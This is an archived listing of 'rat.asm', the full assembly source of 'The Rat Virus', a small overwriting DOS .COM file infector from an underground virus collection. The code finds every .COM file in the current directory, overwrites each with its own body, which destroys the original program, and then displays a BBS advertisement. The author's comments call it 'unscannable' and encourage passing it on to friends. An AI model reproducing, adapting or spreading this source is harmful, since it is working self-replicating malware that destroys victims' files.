home *** CD-ROM | disk | FTP | other *** search
/ Underground / Underground CD1.iso / virii / zrodla / r / rat.asm < prev    next >
Encoding:
Assembly Source File  |  1998-01-14  |  5.0 KB  |  127 lines
  1.   
  2.  
  3. PAGE  59,132
  4.  
  5. ;*************************************
  6.  
  7. ;**The Rat Virus - Overwriting      **
  8.  
  9. ;**                Non-Resident     **
  10.  
  11. ;**                Com File Infector**
  12.  
  13. ;**                Author: -Ajax-   **
  14.  
  15. ;** This virus is 92 bytes long     **
  16.  
  17. ;** Because it is made in 1992 :)   **
  18.  
  19. ;**/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/**
  20.  
  21. ;** Pass this unscannable around to **
  22.  
  23. ;** Your friends,and tell em McAfee **
  24.  
  25. ;** sent ya!                        **
  26.  
  27. ;**/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/**
  28.  
  29. ;** Underground Asylum-904/688.6494 **
  30.  
  31. ;**"Replication Is Our Middle Name!"**
  32.  
  33. ;*************************************
  34.  
  35.  
  36.  
  37. retf            macro   ret_count               ; Fixup for Assembler
  38.  
  39.                 ifdef   ret_count
  40.  
  41.                 db      0CAh
  42.  
  43.                 dw      ret_count
  44.  
  45.                 elseif
  46.  
  47.                 db      0CBh
  48.  
  49.                 endif
  50.  
  51. endm
  52.  
  53.   
  54.  
  55. retn             macro  ret_count
  56.  
  57.                  ifdef  ret_count
  58.  
  59.                  db     0C2h
  60.  
  61.                  dw     ret_count
  62.  
  63.                  elseif
  64.  
  65.                  db     0C3h
  66.  
  67.                  endif
  68.  
  69. endm
  70.  
  71.   
  72.  
  73. movseg           macro reg16, unused, Imm16     ; Fixup for Assembler
  74.  
  75.                  ifidn  <reg16>, <bx>
  76.  
  77.                  db     0BBh
  78.  
  79.                  endif
  80.  
  81.                  ifidn  <reg16>, <cx>
  82.  
  83.                  db     0B9h
  84.  
  85.                  endif
  86.  
  87.                  ifidn  <reg16>, <dx>
  88.  
  89.                  db     0BAh
  90.  
  91.                  endif
  92.  
  93.                  ifidn  <reg16>, <si>
  94.  
  95.                  db     0BEh
  96.  
  97.                  endif
  98.  
  99.                  ifidn  <reg16>, <di>
  100.  
  101.                  db     0BFh
  102.  
  103.                  endif
  104.  
  105.                  ifidn  <reg16>, <bp>
  106.  
  107.                  db     0BDh
  108.  
  109.                  endif
  110.  
  111.                  ifidn  <reg16>, <sp>
  112.  
  113.                  db     0BCh
  114.  
  115.                  endif
  116.  
  117.                  ifidn  <reg16>, <BX>
  118.  
  119.                  db     0BBH
  120.  
  121.                  endif
  122.  
  123.                  ifidn  <reg16>, <CX>
  124.  
  125.                  db     0B9H
  126.  
  127.                  endif
  128.  
  129.                  ifidn  <reg16>, <DX>
  130.  
  131.                  db     0BAH
  132.  
  133.                  endif
  134.  
  135.                  ifidn  <reg16>, <SI>
  136.  
  137.                  db     0BEH
  138.  
  139.                  endif
  140.  
  141.                  ifidn  <reg16>, <DI>
  142.  
  143.                  db     0BFH
  144.  
  145.                  endif
  146.  
  147.                  ifidn  <reg16>, <BP>
  148.  
  149.                  db     0BDH
  150.  
  151.                  endif
  152.  
  153.                  ifidn  <reg16>, <SP>
  154.  
  155.                  db     0BCH
  156.  
  157.                  endif
  158.  
  159.                  dw     seg Imm16
  160.  
  161. endm
  162.  
  163. location_file   equ     9Eh                     ; location of file in DTA
  164.  
  165.   
  166.  
  167. seg_a           segment byte public
  168.  
  169.                 assume  cs:seg_a, ds:seg_a
  170.  
  171.   
  172.  
  173.   
  174.  
  175.                 org     100h                    ; Starting of all .COM files
  176.  
  177.   
  178.  
  179. rat_virus       proc    far
  180.  
  181.   
  182.  
  183. start:
  184.  
  185.                 mov     ah,4Eh                  ; fixup for making undetectable
  186.  
  187.                 mov     cl,20h                  ;      
  188.  
  189.                 mov     dx,offset all_com_files ;                   
  190.  
  191.                 int     21h                     ;                               
  192.  
  193.                                                 ;                                    
  194.  
  195. start_infecting:
  196.  
  197.                 mov     ax,3D01h                ;     
  198.  
  199.                 mov     dx,Location_file        ;               
  200.  
  201.                 int     21h                     ; Open target file.            
  202.  
  203.                                                                                    
  204.  
  205.                 mov     bx,ax                     
  206.  
  207.                 mov     dx,offset ds:[100h]     ; Location of file to write.
  208.  
  209.                 mov     cl,5ch                  ; File size to overwrite.
  210.  
  211.                 mov     ah,40h                  ;     
  212.  
  213.                 int     21h                     ; Write to filename in dx        
  214.  
  215.                                                 ;                                  
  216.  
  217.                 mov     ah,3Eh                  ;     
  218.  
  219.                 int     21h                     ;                                   
  220.  
  221.                                                 ;                             
  222.  
  223.                 mov     ah,4Fh                  ;    
  224.  
  225.                 int     21h                     ;                               
  226.  
  227.                                                 ;                           
  228.  
  229.                 jnc     start_infecting         ; If more files,keep goin
  230.  
  231.                 mov     ah,09h                  ; 
  232.  
  233.                 mov     dx,offset bbs_ad        ; display my bbsad!
  234.  
  235.                 int     21h
  236.  
  237.                 int     20h                     ; get to dos.
  238.  
  239. all_com_files   db      2Ah, 2Eh, 43h, 4Fh, 4Dh, 00h     ; data for all com files
  240.  
  241.                                                          ; in current dir..
  242.  
  243. bbs_ad          db      'Underground Asylum BBS - [904]688.6494$'
  244.  
  245. rat_virus       endp
  246.  
  247.   
  248.  
  249. seg_a           ends
  250.  
  251.                 end     start
  252.  
  253.